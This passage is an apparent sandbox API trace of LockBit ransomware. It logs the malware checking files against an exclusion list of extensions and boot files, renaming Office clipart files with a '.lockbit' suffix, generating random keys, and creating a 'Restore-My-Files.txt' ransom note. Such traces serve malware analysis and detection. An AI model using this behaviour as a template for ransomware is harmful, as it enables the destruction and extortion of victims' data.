lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.444] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.444] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.444] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.444] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.444] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.444] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.444] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.lockbit") returned 72 [0109.444] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0109.444] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.444] malloc (_Size=0x40068) returned 0x3db00b8 [0109.446] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=1588) returned 1 [0109.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.446] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0109.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0109.447] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0109.453] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.453] malloc (_Size=0xa6) returned 0x77d800 [0109.453] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.454] free (_Block=0x77d800) [0109.454] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.454] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.454] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.454] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62c55700, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x62c55700, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0x4bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00438_.WMF", cAlternateFileName="")) returned 1 [0109.455] lstrcmpiW (lpString1=".", lpString2="BS00438_.WMF") returned -1 [0109.455] lstrcmpiW (lpString1="..", lpString2="BS00438_.WMF") returned -1 [0109.455] PathFindExtensionW (pszPath="BS00438_.WMF") returned=".WMF" [0109.455] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.455] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.456] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.456] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00438_.WMF") returned 1 [0109.457] lstrcmpiW (lpString1="ntldr", lpString2="BS00438_.WMF") returned 1 [0109.457] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00438_.WMF") returned 1 [0109.457] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00438_.WMF") returned -1 [0109.457] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00438_.WMF") returned -1 [0109.457] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00438_.WMF") returned 1 [0109.457] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00438_.WMF") returned 1 [0109.457] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.457] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned=".WMF" [0109.457] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.457] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.457] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.458] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.458] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.lockbit") returned 72 [0109.458] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0109.459] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.459] malloc (_Size=0x40068) returned 0x3e70008 [0109.459] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1212) returned 1 [0109.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0109.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0109.460] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0109.469] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.469] malloc (_Size=0xa6) returned 0x77d800 [0109.469] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.469] free (_Block=0x77d800) [0109.470] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.470] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.470] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.470] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x276b5e00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x276b5e00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00439_.WMF", cAlternateFileName="")) returned 1 [0109.470] lstrcmpiW (lpString1=".", lpString2="BS00439_.WMF") returned -1 [0109.470] lstrcmpiW (lpString1="..", lpString2="BS00439_.WMF") returned -1 [0109.470] PathFindExtensionW (pszPath="BS00439_.WMF") returned=".WMF" [0109.470] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.470] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.471] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.472] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.472] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00439_.WMF") returned 1 [0109.472] lstrcmpiW (lpString1="ntldr", lpString2="BS00439_.WMF") returned 1 [0109.473] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00439_.WMF") returned 1 [0109.473] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00439_.WMF") returned -1 [0109.473] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00439_.WMF") returned -1 [0109.473] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00439_.WMF") returned 1 [0109.473] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00439_.WMF") returned 1 [0109.473] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.473] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned=".WMF" [0109.473] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.473] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.473] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.474] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.474] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.474] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.474] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.474] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.474] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.474] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.474] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.lockbit") returned 72 [0109.474] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0109.501] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.501] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.501] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2052) returned 1 [0109.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.502] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.514] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.514] malloc (_Size=0xa6) returned 0x77d800 [0109.515] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.515] free (_Block=0x77d800) [0109.515] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.516] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.516] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x263a3100, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x263a3100, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x15cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00440_.WMF", cAlternateFileName="")) returned 1 [0109.516] lstrcmpiW (lpString1=".", lpString2="BS00440_.WMF") returned -1 [0109.516] lstrcmpiW (lpString1="..", lpString2="BS00440_.WMF") returned -1 [0109.516] PathFindExtensionW (pszPath="BS00440_.WMF") returned=".WMF" [0109.516] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.516] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW 